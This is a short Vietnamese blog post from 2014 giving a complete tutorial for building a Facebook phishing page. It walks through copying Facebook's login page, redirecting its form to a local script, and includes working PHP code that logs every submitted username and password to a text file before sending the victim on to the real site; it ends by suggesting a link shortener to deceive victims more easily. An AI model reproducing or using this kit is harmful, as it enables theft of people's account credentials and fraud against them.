Thứ Sáu, 7 tháng 2, 2014

Hướng dẫn tạo trang phishing facebook

Hướng dẫn tạo trang phishing facebook
Đầu tiên lưu source trang facebook đặt tên cho nó là index . dùng ctrl+S cái này ai cũng biết rồi :D
Tiếp theo, Edit file index, Ctrl+F tìm "action"
Tìm cái đoạn có chữ thế này action="https://www.facebook.com/login.php?login_attempt=1" method="post
Đổi https://www.facebook.com/login.php?login_attempt=1 thành login.php ( cách tạo file này sẽ được nói ở dưới)
Đổi tiếp post thành get
Giờ đến phần tạo file "login.php"
mở notepad lưu đoạn này vào


<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Lưu là"login.php" tạo thêm file passes.txt nữa là có 1 site phishing hoàn chỉnh rồi. giờ up lên host, có thể dùng http://goo.gl/ để rút gọn link để dễ đi lừa hơn :D

P/S: muốn xem user pass thì xem cái file passes.txt

3 nhận xét: